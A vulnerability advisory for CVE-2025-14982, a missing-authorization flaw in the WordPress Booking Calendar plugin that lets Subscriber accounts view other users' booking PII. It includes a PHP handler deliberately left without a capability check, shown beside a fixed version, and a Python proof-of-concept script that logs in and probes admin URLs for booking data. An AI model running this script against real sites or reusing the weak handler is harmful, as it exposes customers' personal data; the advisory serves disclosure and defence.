Security Vulnerability Report
CVE-2025-14982 (CVSS 4.3, MEDIUM)

Published: 2026-01-16 05:16:12
Last Modified: 2026-04-15 00:35:42

Description

The Booking Calendar plugin for WordPress is vulnerable to Missing Authorization leading to Sensitive Information Exposure in all versions up to, and including, 10.14.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view all booking records in the database, including personally identifiable information (PII) such as names, email addresses, phone numbers, physical addresses, payment status, booking costs, and booking hashes belonging to other users.
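The flaw class here (CWE-862, missing authorization) is a handler that treats "logged in" as "allowed". The following is an added illustration, not Booking Calendar's own code: a hypothetical AJAX booking-listing handler in its weak form beside a corrected form. The AJAX action name is taken from the PoC below; the 'manage_bookings' capability, the 'wpbc_bookings_nonce' action and the {prefix}booking table are assumed names.

```php
<?php
/*
 * Added illustration, not Booking Calendar's own code: two hypothetical AJAX
 * handlers for a booking listing. The 'manage_bookings' capability, the
 * 'wpbc_bookings_nonce' action and the {prefix}booking table are assumed names.
 */

// WEAK (CWE-862): the wp_ajax_ hook already limits the action to logged-in
// users, and the handler adds nothing more, so a Subscriber receives every row.
function wpbc_weak_get_bookings() {
    global $wpdb;
    $rows = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}booking", ARRAY_A );
    wp_send_json_success( $rows ); // names, emails, phones, costs, hashes ...
}

// FIXED: authentication is not authorization. Require a capability that only
// booking managers hold, then a nonce tied to the plugin's own admin page.
function wpbc_fixed_get_bookings() {
    if ( ! current_user_can( 'manage_bookings' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    check_ajax_referer( 'wpbc_bookings_nonce', 'nonce' ); // dies with 403 on failure

    global $wpdb;
    $per_page = min( absint( $_GET['per_page'] ?? 20 ), 100 );
    $rows     = $wpdb->get_results(
        $wpdb->prepare( "SELECT * FROM {$wpdb->prefix}booking LIMIT %d", $per_page ),
        ARRAY_A
    );
    wp_send_json_success( $rows );
}
add_action( 'wp_ajax_wpbc_get_bookings', 'wpbc_fixed_get_bookings' );

// The same rule applies to admin menu pages: the capability passed to
// add_menu_page() decides who can open the listing. 'read' (held by every
// role, including Subscriber) would reproduce the exposure; so would a
// page callback that renders data without re-checking the capability.
add_action( 'admin_menu', function () {
    add_menu_page(
        'Bookings', 'Bookings', 'manage_bookings', 'wpbc',
        function () {
            if ( ! current_user_can( 'manage_bookings' ) ) {
                wp_die( esc_html__( 'You are not allowed to view bookings.' ), 403 );
            }
            echo '<div class="wrap"><h1>Bookings</h1></div>';
        }
    );
} );
```

Because wp_ajax_ hooks are reachable by any authenticated role, a capability check inside the handler is the only thing that distinguishes a Subscriber from a booking manager.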

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Booking Calendar WordPress Plugin < 10.14.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14982 PoC - WordPress Booking Calendar Unauthorized Access
# This PoC demonstrates the missing authorization vulnerability in Booking Calendar plugin
import requests
import sys
from urllib.parse import urljoin


def exploit_booking_calendar(target_url, username, password):
    """
    Exploit the missing authorization vulnerability in WordPress Booking Calendar plugin.
    Requires only subscriber-level access to extract all booking records.
    """
    session = requests.Session()

    # Step 1: Login to WordPress with low-privilege account (subscriber role)
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    response = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' not in session.cookies:
        print('[-] Login failed')
        return None
    print('[+] Login successful with subscriber account')

    # Step 2: Access booking listing page without proper authorization check
    # The vulnerable endpoint is typically found in the admin area
    booking_urls = [
        '/wp-admin/admin.php?page=wpbc&view_mode=listing',
        '/wp-admin/admin.php?page=bookings&tab=listing',
        '/?wpbc_ajax=1&action=wpbc_get_bookings'
    ]
    for booking_url in booking_urls:
        full_url = urljoin(target_url, booking_url)
        response = session.get(full_url)
        # Check if we can access booking data
        if 'booking' in response.text.lower() or 'email' in response.text:
            print(f'[+] Successfully accessed booking data at: {full_url}')
            print('[+] Response contains booking records with PII')
            return response.text
    print('[-] Could not extract booking data')
    return None


if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>')
        print(f'Example: python {sys.argv[0]} http://example.com subscriber password123')
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit_booking_calendar(target, user, pwd)

Additional Record Data

Vulnerability Status: Deferred
Weakness: CWE-862 (Missing Authorization)
CVSS v3.1 Subscores: Exploitability 2.8, Impact 1.4

References

https://plugins.trac.wordpress.org/browser/booking/trunk/core/any/class-admin-menu.php#L22
https://plugins.trac.wordpress.org/browser/booking/trunk/core/wpbc-activation.php#L661
https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__listing.php#L150
https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__listing.php#L158
https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__sql.php#L722
https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__sql.php#L918
https://plugins.trac.wordpress.org/changeset?old_path=%2Fbooking&old=3436482&new_path=%2Fbooking&new=3436482&sfp_email=&sfph_mail=
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3432649%40booking%2Ftrunk&old=3416518%40booking%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/161d92e3-d255-4967-9449-be263a46bec8?source=cve